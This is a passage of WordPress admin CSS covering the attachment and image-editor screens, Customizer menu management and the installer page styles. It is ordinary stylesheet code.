{ overflow: auto; box-sizing: border-box; margin-bottom: 0; padding: 12px 16px 0; width: 35%; height: 100%; box-shadow: inset 0 4px 4px -4px rgba(0, 0, 0, 0.1); border-bottom: 0; border-left: 1px solid #dcdcde; background: #f6f7f7; } .edit-attachment-frame .attachment-info .details, .edit-attachment-frame .attachment-info .settings { position: relative; /* RTL fix, #WP29352 */ overflow: hidden; float: none; margin-bottom: 15px; padding-bottom: 15px; border-bottom: 1px solid #dcdcde; } .edit-attachment-frame .attachment-info .filename { font-weight: 400; color: #646970; } .edit-attachment-frame .attachment-info .thumbnail { margin-bottom: 12px; } .attachment-info .actions { margin-bottom: 16px; } .attachment-info .actions a { display: inline; text-decoration: none; } .copy-to-clipboard-container { display: flex; align-items: center; margin-top: 8px; clear: both; } .copy-to-clipboard-container .copy-attachment-url { white-space: normal; } .copy-to-clipboard-container .success { color: #007017; margin-left: 8px; } /*------------------------------------------------------------------------------ 14.2 - Image Editor ------------------------------------------------------------------------------*/ .wp_attachment_details .attachment-alt-text { margin-bottom: 5px; } .wp_attachment_details #attachment_alt { max-width: 500px; height: 3.28571428em; } .wp_attachment_details .attachment-alt-text-description { margin-top: 5px; } .wp_attachment_details label[for="content"] { font-size: 13px; line-height: 1.5; margin: 1em 0; } .wp_attachment_details #attachment_caption { height: 4em; } .describe .image-editor { vertical-align: top; } .imgedit-wrap { position: relative; padding-top: 10px; } .image-editor p, .image-editor fieldset { margin: 8px 0; } .image-editor legend { margin-bottom: 5px; } .describe .imgedit-wrap .image-editor { padding: 0 5px; } .wp_attachment_holder div.updated { margin-top: 0; } .wp_attachment_holder .imgedit-wrap > div { height: auto; } .imgedit-panel-content { display: flex; flex-wrap: wrap; gap: 20px; margin-bottom: 20px; } .imgedit-settings { max-width: 240px; /* Prevent reflow when help info is expanded. */ } .imgedit-group-controls > * { display: none; } .imgedit-panel-active .imgedit-group-controls > * { display: block; } .imgedit-panel-active .imgedit-group-controls > .imgedit-crop-apply { display: flex; } .imgedit-crop-apply { gap: 4px; flex-wrap: wrap; } .wp_attachment_holder .imgedit-wrap .image-editor { float: right; width: 250px; } .image-editor input { margin-top: 0; vertical-align: middle; } .imgedit-wait { position: absolute; top: 0; bottom: 0; width: 100%; background: #fff; opacity: 0.7; filter: alpha(opacity=70); display: none; } .imgedit-wait:before { content: ""; display: block; width: 20px; height: 20px; position: absolute; left: 50%; top: 50%; margin: -10px 0 0 -10px; background: transparent url(../images/spinner.gif) no-repeat center; background-size: 20px 20px; transform: translateZ(0); } .no-float { float: none; } .media-disabled, .image-editor .disabled { /* WCAG 1.4.3 Text or images of text that are part of an inactive user interface component ... have no contrast requirement. */ color: #a7aaad; } .A1B1 { overflow: hidden; } .wp_attachment_image .button, .A1B1 .button { float: left; } .no-js .wp_attachment_image .button { display: none; } .wp_attachment_image .spinner, .A1B1 .spinner { float: left; } .imgedit-menu .note-no-rotate { clear: both; margin: 0; padding: 1em 0 0; } .imgedit-menu .button:after, .imgedit-menu .button:before { font: normal 16px/1 dashicons; margin-right: 8px; vertical-align: middle; position: relative; top: -2px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .imgedit-menu .imgedit-rotate.button:after { content: '\f140'; margin-left: 2px; margin-right: 0; } .imgedit-menu .imgedit-rotate.button[aria-expanded="true"]:after { content: '\f142'; } .imgedit-menu .button.disabled { color: #a7aaad; border-color: #dcdcde; background: #f6f7f7; box-shadow: none; text-shadow: 0 1px 0 #fff; cursor: default; transform: none; } .imgedit-crop:before { content: "\f165"; content: "\f165" / ''; } .imgedit-scale:before { content: "\f211"; content: "\f211" / ''; } .imgedit-rotate:before { content: "\f167"; content: "\f167" / ''; } .imgedit-undo:before { content: "\f171"; content: "\f171" / ''; } .imgedit-redo:before { content: "\f172"; content: "\f172" / ''; } .imgedit-crop-wrap { position: relative; } .imgedit-crop-wrap img { background-image: linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 0 0, 10px 10px; background-size: 20px 20px; } .imgedit-crop-wrap { padding: 20px; background-image: linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 0 0, 10px 10px; background-size: 20px 20px; } .imgedit-crop { margin: 0 8px 0 0; } .imgedit-rotate { margin: 0 8px 0 3px; } .imgedit-undo { margin: 0 3px; } .imgedit-redo { margin: 0 8px 0 3px; } .imgedit-thumbnail-preview-group { display: flex; flex-wrap: wrap; column-gap: 10px; } .imgedit-thumbnail-preview { margin: 10px 8px 0 0; } .imgedit-thumbnail-preview-caption { display: block; } #poststuff .imgedit-group-top h2 { display: inline-block; margin: 0; padding: 0; font-size: 14px; line-height: 1.4; } #poststuff .imgedit-group-top .button-link { text-decoration: none; color: #1d2327; } .imgedit-applyto .imgedit-label { display: block; padding: .5em 0 0; } .imgedit-popup-menu, .imgedit-help { display: none; padding-bottom: 8px; } .imgedit-panel-tools > .imgedit-menu { display: flex; column-gap: 4px; align-items: flex-start; flex-wrap: wrap; } .imgedit-popup-menu { width: calc( 100% - 20px ); position: absolute; background: #fff; padding: 10px; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); } .image-editor .imgedit-menu .imgedit-popup-menu button { display: block; margin: 2px 0; width: 100%; white-space: break-spaces; line-height: 1.5; padding-top: 3px; padding-bottom: 2px; } .imgedit-rotate-menu-container { position: relative; } .imgedit-help.imgedit-restore { padding-bottom: 0; } /* higher specificity than buttons */ .image-editor .imgedit-settings .imgedit-help-toggle, .image-editor .imgedit-settings .imgedit-help-toggle:hover, .image-editor .imgedit-settings .imgedit-help-toggle:active { border: 1px solid transparent; margin: -1px 0 0 -1px; padding: 0; background: transparent; color: var(--wp-admin-theme-color); font-size: 20px; line-height: 1; cursor: pointer; box-sizing: content-box; box-shadow: none; } .image-editor .imgedit-settings .imgedit-help-toggle:focus { color: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 1px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .form-table td.imgedit-response { padding: 0; } .imgedit-submit-btn { margin-left: 20px; } .imgedit-wrap .nowrap { white-space: nowrap; font-size: 12px; line-height: inherit; } span.imgedit-scale-warn { display: flex; align-items: center; margin: 4px; gap: 4px; color: #b32d2e; font-style: normal; visibility: hidden; vertical-align: middle; } .imgedit-save-target { margin: 8px 0; } .imgedit-save-target legend { font-weight: 600; } .imgedit-group { margin-bottom: 20px; } .image-editor .imgedit-original-dimensions { display: inline-block; } .image-editor .imgedit-scale-controls input[type="text"], .image-editor .imgedit-crop-ratio input[type="text"], .image-editor .imgedit-crop-sel input[type="text"], .image-editor .imgedit-scale-controls input[type="number"], .image-editor .imgedit-crop-ratio input[type="number"], .image-editor .imgedit-crop-sel input[type="number"] { width: 80px; font-size: 14px; padding: 0 8px; } .imgedit-separator { display: inline-block; width: 7px; text-align: center; font-size: 13px; color: #3c434a; } .image-editor .imgedit-scale-button-wrapper { margin-top: 0.3077em; display: block; } .image-editor .imgedit-scale-controls .button { margin-bottom: 0; } audio, video { display: inline-block; max-width: 100%; } .wp-core-ui .mejs-container { width: 100%; max-width: 100%; } .wp-core-ui .mejs-container * { box-sizing: border-box; } .wp-core-ui .mejs-time { box-sizing: content-box; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .imgedit-wait:before { background-image: url(../images/spinner-2x.gif); } } @media screen and (max-width: 782px) { .edit-attachment-frame input, .edit-attachment-frame textarea { line-height: 1.5; } .wp_attachment_details label[for="content"] { font-size: 14px; line-height: 1.5; } .wp_attachment_details textarea { line-height: 1.5; } .wp_attachment_details #attachment_alt { height: 3.375em; } .media-upload-form .media-item.error, .media-upload-form .media-item .error { font-size: 13px; line-height: 1.5; } .media-upload-form .media-item.error { padding: 1px 10px; } .media-upload-form .media-item .error { padding: 10px 0 10px 12px; } .image-editor .imgedit-scale input[type="text"], .image-editor .imgedit-crop-ratio input[type="text"], .image-editor .imgedit-crop-sel input[type="text"] { font-size: 16px; padding: 6px 10px; } .wp_attachment_holder .imgedit-wrap .imgedit-panel-content, .wp_attachment_holder .imgedit-wrap .image-editor { float: none; width: auto; max-width: none; padding-bottom: 16px; } .copy-to-clipboard-container .success { font-size: 14px; } /* Restructure image editor on narrow viewports. */ .imgedit-crop-wrap img{ width: 100%; } .media-modal .imgedit-wrap .imgedit-panel-content, .media-modal .imgedit-wrap .image-editor { position: initial !important; } .media-modal .imgedit-wrap .image-editor { box-sizing: border-box; width: 100% !important; } .image-editor .imgedit-scale-button-wrapper { display: inline-block; } } @media only screen and (max-width: 600px) { .media-item-wrapper { grid-template-columns: 1fr; } } /** * Media queries for media grid. */ @media only screen and (max-width: 1120px) { /* override for media-views.css */ #wp-media-grid .wp-filter .attachment-filters { max-width: 100%; } } @media only screen and (max-width: 1000px) { /* override for forms.css */ .wp-filter p.search-box { float: none; width: 100%; display: flex; flex-wrap: nowrap; column-gap: 0; } .wp-filter p.search-box #media-search-input { width: 100%; } } @media only screen and (max-width: 782px) { .media-frame.mode-select .attachments-browser.fixed .media-toolbar { top: 46px; right: 10px; } .media-frame.mode-grid .media-toolbar select { min-height: 40px; padding: 0 24px 0 12px; } .media-frame.mode-grid .media-toolbar input[type="search"] { min-height: 40px; padding: 0 12px; } .wp-filter p.search-box { margin-bottom: 0; } } @media only screen and (max-width: 600px) { .media-frame.mode-select .attachments-browser.fixed .media-toolbar { top: 0; } } @media only screen and (max-width: 480px) { .edit-attachment-frame .media-frame-title { right: 110px; } .upload-php .media-modal-close, .edit-attachment-frame .edit-media-header .left, .edit-attachment-frame .edit-media-header .right { width: 40px; height: 40px; } .edit-attachment-frame .edit-media-header .right:before, .edit-attachment-frame .edit-media-header .left:before { line-height: 40px !important; } .edit-attachment-frame .edit-media-header .left { right: 82px; } .edit-attachment-frame .edit-media-header .right { right: 41px; } .edit-attachment-frame .media-frame-content { top: 40px; } .edit-attachment-frame .attachment-media-view { float: none; height: auto; width: 100%; } .edit-attachment-frame .attachment-info { height: auto; width: 100%; } } @media only screen and (max-width: 640px), screen and (max-height: 400px) { .upload-php .mode-grid .media-sidebar{ max-width: 100%; } } @media only screen and (max-width: 375px) { .media-item .attachment-tools { align-items: baseline; } .media-item .edit-attachment.copy-to-clipboard-container { flex-direction: column; } .copy-to-clipboard-container .success { line-height: normal; margin-top: 10px; } } /*! This file is auto-generated */ #customize-theme-controls #accordion-section-menu_locations{position:relative;margin-top:30px}#customize-theme-controls #accordion-section-menu_locations>.accordion-section-title{border-bottom-color:#dcdcde;margin-top:15px}#customize-theme-controls .customize-section-title-menu_locations-description,#customize-theme-controls .customize-section-title-menu_locations-heading,#customize-theme-controls .customize-section-title-nav_menus-heading{padding:0 12px}#customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description{font-style:normal}.menu-in-location,.menu-in-locations{display:block;font-weight:600;font-size:10px}#customize-controls .control-section .accordion-section-title:focus .menu-in-location,#customize-controls .control-section .accordion-section-title:hover .menu-in-location,#customize-controls .theme-location-set{color:#50575e}.customize-control-nav_menu_location .create-menu,.customize-control-nav_menu_location .edit-menu{margin-left:6px;vertical-align:middle;line-height:2.2}#customize-controls .customize-control-nav_menu_name{margin-bottom:12px}.customize-control-nav_menu_name p:last-of-type{margin-bottom:0}#customize-new-menu-submit{float:right;min-width:85px}.wp-customizer .menu-item-bar .menu-item-handle,.wp-customizer .menu-item-settings,.wp-customizer .menu-item-settings .description-thin{box-sizing:border-box}.wp-customizer .menu-item-bar{margin:0}.wp-customizer .menu-item-bar .menu-item-handle{width:100%;max-width:100%;background:#fff}.wp-customizer .menu-item-handle .item-title{margin-right:0}.wp-customizer .menu-item-handle .item-type{padding:1px 21px 0 5px;float:right;text-align:right}.wp-customizer .menu-item-handle:hover{z-index:8}.customize-control-nav_menu_item.has-notifications .menu-item-handle{border-left:4px solid #72aee6}.wp-customizer .menu-item-settings{max-width:100%;overflow:hidden;z-index:8;padding:10px;background:#f0f0f1;border:1px solid #8c8f94;border-top:none}.wp-customizer .menu-item-settings .description-thin{width:100%;height:auto;margin:0 0 8px}.wp-customizer .menu-item-settings input[type=text]{width:100%}.wp-customizer .menu-item-settings .submitbox{margin:0;padding:0}.wp-customizer .menu-item-settings .link-to-original{padding:5px 0;border:none;font-style:normal;margin:0;width:100%}.wp-customizer .menu-item .submitbox .submitdelete{float:left;margin:6px 0 0;padding:0;cursor:pointer}.menu-item-reorder-nav{display:none;background-color:#fff;position:absolute;top:0;right:0}.menus-move-left:before{content:"\f341";content:"\f341"/''}.menus-move-right:before{content:"\f345";content:"\f345"/''}.reordering .menu-item .item-controls,.reordering .menu-item .item-type{display:none}.reordering .menu-item-reorder-nav{display:block}.customize-control input.menu-name-field{width:100%}.wp-customizer .menu-item .item-edit{position:absolute;right:-19px;top:2px;display:block;width:30px;height:38px;margin-right:0!important;box-shadow:none;outline:0;overflow:hidden;cursor:pointer;text-align:center}.wp-customizer .menu-item.menu-item-edit-active .item-edit .toggle-indicator:before{content:"\f142";content:"\f142"/''}.wp-customizer .menu-item-settings p.description{font-style:normal}.wp-customizer .menu-settings dl{margin:12px 0 0;padding:0}.wp-customizer .menu-settings .checkbox-input{margin-top:8px}.wp-customizer .menu-settings .menu-theme-locations{border-top:1px solid #c3c4c7}.wp-customizer .menu-settings{margin-top:36px;border-top:none}.wp-customizer .menu-location-settings{margin-top:12px;border-top:none}.wp-customizer .control-section-nav_menu .menu-location-settings{margin-top:24px;border-top:1px solid #dcdcde}.customize-control-nav_menu_auto_add,.wp-customizer .control-section-nav_menu .menu-location-settings{padding-top:12px}.menu-location-settings .customize-control-checkbox .theme-location-set{line-height:1}.customize-control-nav_menu_auto_add label{vertical-align:top}.menu-location-settings .new-menu-locations-widget-note{display:block}.customize-control-menu{margin-top:4px}#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle{color:#50575e}.customize-screen-options-toggle{background:0 0;border:none;color:#50575e;cursor:pointer;margin:0;padding:20px;position:absolute;right:0;top:30px}#customize-controls .customize-info .customize-help-toggle{padding:20px}#customize-controls .customize-info .customize-help-toggle:before{padding:4px}#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.active-menu-screen-options .customize-screen-options-toggle,.customize-screen-options-toggle:active,.customize-screen-options-toggle:focus,.customize-screen-options-toggle:hover{color:var(--wp-admin-theme-color)}#customize-controls .customize-info .customize-help-toggle:focus,.customize-screen-options-toggle:focus{outline:2px solid transparent}.customize-screen-options-toggle:before{-moz-osx-font-smoothing:grayscale;border:none;content:"\f111";content:"\f111"/'';display:block;font:18px/1 dashicons;padding:5px;text-align:center;text-decoration:none!important;text-indent:0;left:6px;position:absolute;top:6px}#customize-controls .customize-info .customize-help-toggle:focus:before,.customize-screen-options-toggle:focus:before{border-radius:100%}.wp-customizer #screen-options-wrap{display:none;background:#fff;border-top:1px solid #dcdcde;padding:4px 15px 15px}.wp-customizer .metabox-prefs label{display:block;padding-right:0;line-height:30px}.wp-customizer .toggle-indicator{display:inline-block;font-size:20px;line-height:1}.rtl .wp-customizer .toggle-indicator{text-indent:1px}#available-menu-items .accordion-section-title .toggle-indicator:before,.wp-customizer .menu-item .item-edit .toggle-indicator:before{content:"\f140";content:"\f140"/'';display:block;padding:1px 2px 1px 0;border-radius:50%;color:#787c82;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important}.control-section-nav_menu .field-css-classes,.control-section-nav_menu .field-description,.control-section-nav_menu .field-link-target,.control-section-nav_menu .field-title-attribute,.control-section-nav_menu .field-xfn{display:none}.control-section-nav_menu.field-css-classes-active .field-css-classes,.control-section-nav_menu.field-description-active .field-description,.control-section-nav_menu.field-link-target-active .field-link-target,.control-section-nav_menu.field-title-attribute-active .field-title-attribute,.control-section-nav_menu.field-xfn-active .field-xfn{display:block}.menu-item-depth-0{margin-left:0}.menu-item-depth-1{margin-left:20px}.menu-item-depth-2{margin-left:40px}.menu-item-depth-3{margin-left:60px}.menu-item-depth-4{margin-left:80px}.menu-item-depth-5{margin-left:100px}.menu-item-depth-6{margin-left:120px}.menu-item-depth-7{margin-left:140px}.menu-item-depth-8{margin-left:160px}.menu-item-depth-9{margin-left:180px}.menu-item-depth-10{margin-left:200px}.menu-item-depth-11{margin-left:220px}.menu-item-depth-0>.menu-item-bar{margin-right:0}.menu-item-depth-1>.menu-item-bar{margin-right:20px}.menu-item-depth-2>.menu-item-bar{margin-right:40px}.menu-item-depth-3>.menu-item-bar{margin-right:60px}.menu-item-depth-4>.menu-item-bar{margin-right:80px}.menu-item-depth-5>.menu-item-bar{margin-right:100px}.menu-item-depth-6>.menu-item-bar{margin-right:120px}.menu-item-depth-7>.menu-item-bar{margin-right:140px}.menu-item-depth-8>.menu-item-bar{margin-right:160px}.menu-item-depth-9>.menu-item-bar{margin-right:180px}.menu-item-depth-10>.menu-item-bar{margin-right:200px}.menu-item-depth-11>.menu-item-bar{margin-right:220px}.menu-item-depth-0 .menu-item-transport{margin-left:0}.menu-item-depth-1 .menu-item-transport{margin-left:-20px}.menu-item-depth-3 .menu-item-transport{margin-left:-60px}.menu-item-depth-4 .menu-item-transport{margin-left:-80px}.menu-item-depth-2 .menu-item-transport{margin-left:-40px}.menu-item-depth-5 .menu-item-transport{margin-left:-100px}.menu-item-depth-6 .menu-item-transport{margin-left:-120px}.menu-item-depth-7 .menu-item-transport{margin-left:-140px}.menu-item-depth-8 .menu-item-transport{margin-left:-160px}.menu-item-depth-9 .menu-item-transport{margin-left:-180px}.menu-item-depth-10 .menu-item-transport{margin-left:-200px}.menu-item-depth-11 .menu-item-transport{margin-left:-220px}.reordering .menu-item-depth-0{margin-left:0}.reordering .menu-item-depth-1{margin-left:15px}.reordering .menu-item-depth-2{margin-left:30px}.reordering .menu-item-depth-3{margin-left:45px}.reordering .menu-item-depth-4{margin-left:60px}.reordering .menu-item-depth-5{margin-left:75px}.reordering .menu-item-depth-6{margin-left:90px}.reordering .menu-item-depth-7{margin-left:105px}.reordering .menu-item-depth-8{margin-left:120px}.reordering .menu-item-depth-9{margin-left:135px}.reordering .menu-item-depth-10{margin-left:150px}.reordering .menu-item-depth-11{margin-left:165px}.reordering .menu-item-depth-0>.menu-item-bar{margin-right:0}.reordering .menu-item-depth-1>.menu-item-bar{margin-right:15px}.reordering .menu-item-depth-2>.menu-item-bar{margin-right:30px}.reordering .menu-item-depth-3>.menu-item-bar{margin-right:45px}.reordering .menu-item-depth-4>.menu-item-bar{margin-right:60px}.reordering .menu-item-depth-5>.menu-item-bar{margin-right:75px}.reordering .menu-item-depth-6>.menu-item-bar{margin-right:90px}.reordering .menu-item-depth-7>.menu-item-bar{margin-right:105px}.reordering .menu-item-depth-8>.menu-item-bar{margin-right:120px}.reordering .menu-item-depth-9>.menu-item-bar{margin-right:135px}.reordering .menu-item-depth-10>.menu-item-bar{margin-right:150px}.reordering .menu-item-depth-11>.menu-item-bar{margin-right:165px}.control-section-nav_menu.menu .menu-item-edit-active{margin-left:0}.control-section-nav_menu.menu .menu-item-edit-active .menu-item-bar{margin-right:0}.control-section-nav_menu.menu .sortable-placeholder{margin-top:0;margin-bottom:1px;max-width:calc(100% - 2px);float:left;display:list-item;border-color:#a7aaad}.menu-item-transport li.customize-control{float:none}.control-section-nav_menu.menu ul.menu-item-transport .menu-item-bar{margin-top:0}.adding-menu-items .control-section{opacity:.4}.adding-menu-items .control-panel.control-section,.adding-menu-items .control-section.open{opacity:1}.menu-item-bar .item-delete{color:#d63638;position:absolute;top:2px;right:-19px;width:30px;height:38px;cursor:pointer;display:none}.menu-item-bar .item-delete:before{content:"\f335";content:"\f335"/'';position:absolute;top:9px;left:5px;border-radius:50%;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.menu-item-bar .item-delete:focus,.menu-item-bar .item-delete:hover{box-shadow:none;outline:0;color:#d63638}.adding-menu-items .menu-item-bar .item-edit{display:none}.adding-menu-items .menu-item-bar .item-delete{display:block}#available-menu-items.opening{overflow-y:hidden}#available-menu-items #available-menu-items-search.open{height:100%;border-bottom:none}#available-menu-items .accordion-section-title{border-left:none;border-right:none;background:#fff;transition:background-color .15s;-webkit-user-select:auto;user-select:auto}#available-menu-items #available-menu-items-search .accordion-section-title,#available-menu-items .open .accordion-section-title{background:#f0f0f1}#available-menu-items .accordion-section-title:after{content:none!important}#available-menu-items .accordion-section-title:hover .toggle-indicator:before,#available-menu-items .button-link:focus .toggle-indicator:before,#available-menu-items .button-link:hover .toggle-indicator:before{color:#1d2327}#available-menu-items .open .accordion-section-title .toggle-indicator:before{content:"\f142";color:#1d2327}#available-menu-items .available-menu-items-list{overflow-y:auto;max-height:200px;background:0 0}#available-menu-items .accordion-section-title button .toggle-indicator{display:flex;align-items:center;width:28px;height:35px;position:absolute;top:5px;right:5px;box-shadow:none;outline:0;cursor:pointer;text-align:center}#available-menu-items .accordion-section-title .no-items,#available-menu-items .cannot-expand .accordion-section-title .spinner,#available-menu-items .cannot-expand .accordion-section-title>button:not(#available-menu-items-search button.is-visible){display:none}#available-menu-items-search.cannot-expand .accordion-section-title .spinner{display:block}#available-menu-items .cannot-expand .accordion-section-title .no-items{float:right;color:#50575e;font-weight:400;margin-left:5px}#available-menu-items .accordion-section-content{max-height:290px;margin:0;padding:0;position:relative;background:0 0}#available-menu-items .accordion-section-content .available-menu-items-list{margin:0 0 64px;padding:1px 15px 15px}#available-menu-items .accordion-section-content .available-menu-items-list:only-child{margin-bottom:0}#new-custom-menu-item .accordion-section-content{padding:0 15px 15px}#available-menu-items .menu-item-tpl{margin:0}#available-menu-items .new-content-item .create-item-input.invalid,#available-menu-items .new-content-item .create-item-input.invalid:focus,#custom-menu-item-name.invalid,#custom-menu-item-url.invalid,.edit-menu-item-url.invalid,.menu-name-field.invalid,.menu-name-field.invalid:focus{border:1px solid #d63638}#available-menu-items .menu-item-handle .item-type{padding-right:0}#available-menu-items .menu-item-handle .item-title{padding-left:20px}#available-menu-items .menu-item-handle{cursor:pointer}#available-menu-items .menu-item-handle{box-shadow:none;margin-top:-1px}#available-menu-items .menu-item-handle:hover{z-index:1}#available-menu-items .item-title h4{padding:0 0 5px;font-size:14px}#available-menu-items .item-add{position:absolute;top:1px;left:1px;color:#8c8f94;width:30px;height:38px;box-shadow:none;outline:0;cursor:pointer;text-align:center}#available-menu-items .menu-item-handle .item-add:focus{color:#1d2327}#available-menu-items .item-add:before{content:"\f543";content:"\f543"/'';position:relative;left:2px;top:3px;display:inline-block;height:20px;border-radius:50%;font:normal 20px/1.05 dashicons}#available-menu-items .menu-item-handle.item-added .item-add:focus,#available-menu-items .menu-item-handle.item-added .item-title,#available-menu-items .menu-item-handle.item-added .item-type,#available-menu-items .menu-item-handle.item-added:hover .item-add{color:#646970}#available-menu-items .menu-item-handle.item-added .item-add:before{content:"\f147";content:"\f147"/''}#available-menu-items .accordion-section-title.loading .spinner,#available-menu-items-search.loading .accordion-section-title .spinner{visibility:visible;margin:0 20px}#available-menu-items-search .spinner{position:absolute;bottom:24px;right:21px;margin:0!important}#available-menu-items #available-menu-items-search .accordion-section-content{position:absolute;left:0;top:83px;bottom:0;max-height:none;width:100%;padding:1px 15px 15px;box-sizing:border-box}#available-menu-items-search .nothing-found{margin-top:-1px}#available-menu-items-search .accordion-section-title:after{display:none}#available-menu-items-search .accordion-section-content:empty{min-height:0;padding:0}#available-menu-items-search.loading .accordion-section-content div{opacity:.5}#available-menu-items-search.loading.loading-more .accordion-section-content div{opacity:1}@media (prefers-reduced-motion:no-preference){#customize-preview{transition:all .2s}}body.adding-menu-items #available-menu-items{left:0;visibility:visible}body.adding-menu-items .wp-full-overlay-main{left:300px}body.adding-menu-items #customize-preview{opacity:.4}body.adding-menu-items #customize-preview iframe{pointer-events:none}.menu-item-handle .spinner{display:none;float:left;margin:0 8px 0 0}.nav-menu-inserted-item-loading .spinner{display:block}.nav-menu-inserted-item-loading .menu-item-handle .item-type{padding:0 0 0 8px}.added-menu-item .menu-item-handle.loading,.nav-menu-inserted-item-loading .menu-item-handle{padding:10px 15px 10px 8px;cursor:default;opacity:.5;background:#fff;color:#787c82}.added-menu-item .menu-item-handle{transition-property:opacity,background,color;transition-duration:1.25s;transition-timing-function:cubic-bezier(.25,-2.5,.75,8)}#customize-theme-controls .control-panel-content .control-section-nav_menu:nth-last-child(2) .accordion-section-title{border-bottom-color:#dcdcde}#accordion-section-add_menu{margin:15px 12px}#accordion-section-add_menu h3{text-align:right}#accordion-section-add_menu .customize-add-menu-button,#accordion-section-add_menu h3{margin:0}#accordion-section-add_menu .customize-add-menu-button{font-weight:400}#create-new-menu-submit{float:right;margin:0 0 12px}.menu-delete-item{float:left;padding:1em 0;width:100%}.assigned-menu-locations-title p{margin:0 0 8px}li.assigned-to-menu-location .menu-delete-item{display:none}li.assigned-to-menu-location .add-new-menu-item{margin-bottom:1em}.menu-item-handle{margin-top:-1px}.ui-sortable-disabled .menu-item-handle{cursor:default}.menu-item-handle:hover{position:relative;z-index:10;color:var(--wp-admin-theme-color)}#available-menu-items .menu-item-handle:hover .item-add,.menu-item-handle:hover .item-edit,.menu-item-handle:hover .item-type{color:var(--wp-admin-theme-color)}.menu-item-edit-active .menu-item-handle{border-color:#8c8f94;border-bottom:none}.customize-control-nav_menu_item{margin-bottom:0}.customize-control-nav_menu .new-menu-item-invitation{margin-top:0;margin-bottom:0}.customize-control-nav_menu .customize-control-nav_menu-buttons{display:flex;flex-direction:row-reverse;align-items:center;gap:8px;margin-top:12px}#available-menu-items .item-add:focus:before,#customize-controls .customize-info .customize-help-toggle:focus:before,.customize-screen-options-toggle:focus:before,.menu-delete:focus,.menu-item-bar .item-delete:focus:before,.wp-customizer .menu-item .submitbox .submitdelete:focus,.wp-customizer button:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}@media screen and (max-width:782px){#available-menu-items #available-menu-items-search .accordion-section-content{top:71px}}@media screen and (max-width:640px){#available-menu-items #available-menu-items-search .accordion-section-content{top:154px}}/*! This file is auto-generated */ html{background:#f0f0f1;margin:0 20px}body{background:#fff;border:1px solid #c3c4c7;color:#3c434a;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;margin:140px auto 25px;padding:20px 20px 10px;max-width:700px;-webkit-font-smoothing:subpixel-antialiased;box-shadow:0 1px 1px rgba(0,0,0,.04)}a{color:var(--wp-admin-theme-color)}a:active,a:hover{color:var(--wp-admin-theme-color-darker-20)}a:focus{color:var(--wp-admin-theme-color-darker-20);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}h1,h2{border-bottom:1px solid #dcdcde;clear:both;color:#646970;font-size:24px;padding:0 0 7px;font-weight:400}h3{font-size:16px}dd,dt,li,p{padding-bottom:2px;font-size:14px;line-height:1.5}.code,code{font-family:Consolas,Monaco,monospace}dl,ol,ul{padding:5px 5px 5px 22px}a img{border:0}abbr{border:0;font-variant:normal}fieldset{border:0;padding:0;margin:0}#logo{margin:-130px auto 25px;padding:0 0 25px;width:84px;height:84px;overflow:hidden;background-image:url(../images/w-logo-gray.png?ver=20260303);background-image:none,url(../images/wordpress-logo-gray.svg?ver=20260303);background-size:84px;background-position:center top;background-repeat:no-repeat;color:#3c434a;font-size:20px;font-weight:400;line-height:1.3em;text-decoration:none;text-align:center;text-indent:-9999px;outline:0}.step{margin:20px 0 15px}.step,th{text-align:left;padding:0}.language-chooser.wp-core-ui .step .button.button-large{font-size:14px}textarea{border:1px solid #dcdcde;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;width:100%;box-sizing:border-box}.form-table{border-collapse:collapse;margin-top:1em;width:100%}.form-table td{margin-bottom:9px;padding:10px 20px 10px 0;font-size:14px;vertical-align:top}.form-table th{font-size:14px;text-align:left;padding:10px 20px 10px 0;width:115px;vertical-align:top}.form-table code{line-height:1.28571428;font-size:14px}.form-table p{margin:4px 0 0;font-size:11px}.form-table .setup-description{margin:4px 0 0;line-height:1.6}.form-table input{line-height:1.33333333;font-size:15px;padding:3px 5px}.wp-pwd{margin-top:0}.form-table .wp-pwd{display:flex;column-gap:4px}.form-table .password-input-wrapper{width:100%}input,submit{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif}#pass-strength-result,.form-table input[type=email],.form-table input[type=password],.form-table input[type=text],.form-table input[type=url]{width:100%}.form-table th p{font-weight:400}.form-table.install-success td,.form-table.install-success th{vertical-align:middle;padding:16px 20px 16px 0}.form-table.install-success td p{margin:0;font-size:14px}.form-table.install-success td code{margin:0;font-size:18px}#error-page{margin-top:50px}#error-page p{font-size:14px;line-height:1.28571428;margin:25px 0 20px}#error-page code,.code{font-family:Consolas,Monaco,monospace}.message{border-left:4px solid #d63638;padding:.7em 